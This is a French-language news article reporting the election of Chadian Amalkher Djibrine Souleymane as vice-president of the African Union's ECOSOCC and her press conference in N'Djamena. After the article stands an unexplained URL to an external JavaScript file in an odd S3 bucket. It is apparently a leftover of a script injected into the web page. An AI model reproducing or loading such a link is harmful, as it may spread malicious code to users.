LA TCHADIENNE AMALKHER DJIBRINE SOULEYMANE ÉLUE VICE-PRÉSIDENTE DU CONSEIL ÉCONOMIQUE SOCIAL ET CULTUREL DE L’UNION AFRICAINE.

0
937

La vice-présidente du Conseil Économique, Social et Culturel de l’Union Africaine (ECOSOCC-UA) AMALKHER DJIBRINE SOULEYMANE a tenu une conférence de presse cet après-midi pour annoncer à la population tchadienne de son élection au poste de Vice-présidente. C’était dans les locaux de NIRVANA à N’Djamena.

Tout est parti à la deuxième session ordinaire de la deuxième Assemblée Générale Permanente du Conseil Économique, Social et Culturel de l’Union Africaine (ECOSOCC-UA) tenue à Naïrobi au Kenya le 11 décembre dernier que Mme AMALKHER DJIBRINE SOULEYMANE est élue Vice-présidente de cette institution africaine qui porte plus haut la voix de la jeunesse. La responsabilité qui attend la nouvelle équipe, explique la Vice-présidente est très énorme. Cette équipe doit effectuer « un travail de coordination, sensibilisation, de prise des décisions etc. » pour tenir à jour son cahier de charge d’autant plus que, leur mandat est de deux ans renouvelables. L’ECOSOCC a été créé aux termes des articles 5 et 22 de l’Acte constitutif de l’Union africaine pour servir de plateforme et l’établissement de partenariat entre les gouvernements et toutes les composantes de la société civile africaine.

En qualité de représentant du Conseil Social et culturel des jeunes africains, AMALKHER DJIBRINE SOULEYMANE répond à la question des journalistes sur l’incompréhension qui règne entre la jeunesse tchadienne elle-même et leur ministère de tutelle « c’est l’union qui fait la force est le Conseil National des Jeunes du Tchad et le ministère de tutelle doivent oublier leur tension pour mieux évoluer ».

Cette institution est aussi un organe consultatif de l’Union africaine, composé de différents groupes sociaux professionnels des États membres de l’Union Africaine. Cette plateforme permet à la société civile africaine de jouer un rôle dynamique dans la planification de l’avenir du continent, de s’organiser en partenariat avec les gouvernements de l’Union Africaine.

La Vice-présidente promet un effort afin de mettre sur pied un bureau local de l’ECOSOCC afin de faire valoir et montrer l’importance de cette plateforme pour les africains.

ECOSOCC est composé de 150 membres issus des différents groupes et associations professionnels des états membres de l’Union Africaine et de la diaspora africaine en raison de deux membres choisis dans chaque Etat de l’union ayant rempli les critères d’éligibilité pour l’élection en tenant compte de l’égalité de genre

La présidence de l’ECOSOCC est assurée par le soudanais M. Abozer Elmana Elligai, la première Vice-présidence est Mme AMALKHER DJIBRINE SOULEYMANE suivie de M. Khalid Boudali du Maroc, M. Patson Malisa de l’Afrique du Sud et M. Francis Akpa du Togo

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

Facebook Comments

LAISSER UN COMMENTAIRE

S'il vous plaît entrez votre commentaire!
S'il vous plaît entrez votre nom ici